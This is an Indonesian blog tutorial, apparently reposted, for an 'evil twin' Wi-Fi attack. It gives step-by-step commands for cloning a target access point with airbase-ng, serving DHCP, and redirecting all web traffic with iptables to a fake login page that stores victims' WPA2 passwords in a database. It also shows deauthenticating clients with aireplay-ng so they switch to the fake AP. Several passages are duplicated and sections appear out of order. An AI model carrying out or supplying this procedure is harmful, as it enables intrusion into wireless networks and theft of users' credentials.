Inti dari trik ini adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan “salah konek”
atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih
ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini
dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data.
Bagaimana attacker melakukannya ? baik kita mulai
1. Mempersiapkan fakelogin AP
3. IPtables
Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT
Kemudian lanjutkan dengan mengaktifkan ip_forward
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE
Perhatikan pada tab terminal airbase-ng
Client Target side
Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik
Anggap client terpancing untuk mengisi password wpa
1. Mempersiapkan fakelogin AP
Untuk contoh kali ini saya telah
mengupload contoh halaman login akses point palsu di
ftp.indonesianbacktrack.or.id , teman-teman bisa mendownloadnya di sana.
A. Membuat database
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,
/etc/init.d/mysql start
B. FakeLogin
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.
root@eichel:/var/www# ls -al total 84 drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 . drwxr-xr-x 15 root root 4096 2011-05-10 22:56 .. -rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html -rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif -rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html -rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin -rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php -rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html -rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css -rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif
Jika sudah jalankan service apache kita “/etc/init.d/apache2 start” kemudian buka localhost atau dengan ip local kita pada browser.
Okey semua yang kita butuhkan sudah siap ,
kemudian seperti yang sudah saya singgung di atas, attacker akan
membuat sebuah AP palsu yang hampir sama dengan AP Target.
2. FakeAP
A. Information Gathering
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai
Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan “airodump-ng [interface-monitor]” untuk mengambil informasi AP Target.
B. Dhclient Server
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.
Uppz ada keterangan fail disitu .. itu
dikarenakan setingan file konfigurasi pada dhcp3-server belum di
konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu
file konfigurasi default sebelum membuat file konfigurasi yang kita
inginkan.
root@eichel:/var/www# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,
root@eichel:/var/www# kwrite /etc/dhcp3/dhcpd.conf
Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.
ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 8.8.8.8; range 192.168.2.130 192.168.2.140; }
Konfigurasi di atas sebenarnya merupakan
konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya.
Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.
C. Airbase-ng
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama
root@eichel:~# airmon-ng stop mon0 Interface Chipset Driver mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed) wlan1 Ralink 2573 USB rt73usb - [phy2] wlan0 Ralink RT2870/3070 rt2800usb - [phy0] root@eichel:~# airmon-ng stop wlan0 Interface Chipset Driver wlan1 Ralink 2573 USB rt73usb - [phy2] wlan0 Ralink RT2870/3070 rt2800usb - [phy0] (monitor mode disabled)
Jika sudah sesuai dengan channel AP target ( dalam kasus ini 11 – lihat pada tahap information gathering ) , kita memulai airmon-ng pada channel 11.
Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil “information gathering” dengan airodump untuk mengecoh client.
syntaxnya : airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]
Kemudian perhatikan output pada perintah
airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan
menciptakan sebuah interface baru yaitu “at0″ dimana nantinya interface
at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang
sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan
konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service dhcp3-server.
3. IPtables
Setelah semuanya berhasil dengan baik,
harapan attacker adalah client terkecoh ketika mengakses fakeAP yang
telah di buat sebelumnya, maka attacker berharap agar client mengira
bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi
authentifikasi pada browser. yaitu pada index fakelogin yang telah kita
siapkan pada server apache/httpd pada localhost kita.
Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi
masalah lagi, tapi bagaimana agar client mengakses localhost kita yang
menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url
yang dimasukan client pada browser ( port 80 ) menuju kepada localhost
kita. Misalnya client mengakses google.com maka browser akan
mengarahkannya terlebih dahulu ke file pada localhost apache kita.
A. Menghapus semua setingan IPtables.Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll
root@eichel:~# iptables --flush root@eichel:~# iptables --table nat --flush root@eichel:~# iptables --delete-chain root@eichel:~# iptables --table nat --delete-chainB.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT
Kemudian lanjutkan dengan mengaktifkan ip_forward
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward
C. Redirect semua permintaan pada port 80
Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.
Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.
ifconfig eth0 eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85 inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:99424 errors:0 dropped:0 overruns:0 frame:0 TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB) Interrupt:43
Okey seperti ouput di atas agaknya saya
menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda
dengan akses point target. Hmm jgn bingung dengan hal ini karena ada
kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet
ip pada tiap2 AP yang terdapat dalam satu jaringan.
root@eichel:~#iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.13:80root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE
4. Deauthentifikasi
Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya
Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya
Perhatikan pada tab terminal airbase-ng
okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP
Client Target side
Mari kita mengintip sebentar proses pada client
Client pada percobaan kali ini memakai
sistem operasi windows 7 , anggap saja client masih terkonek dengan AP
asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk
Kemudian keadaan koneksi ke AP pada saat serangan deauth
Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik
Anggap client terpancing untuk mengisi password wpa
5. Melihat hasil
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database
Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..
sumber : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/
Tidak ada komentar:
Posting Komentar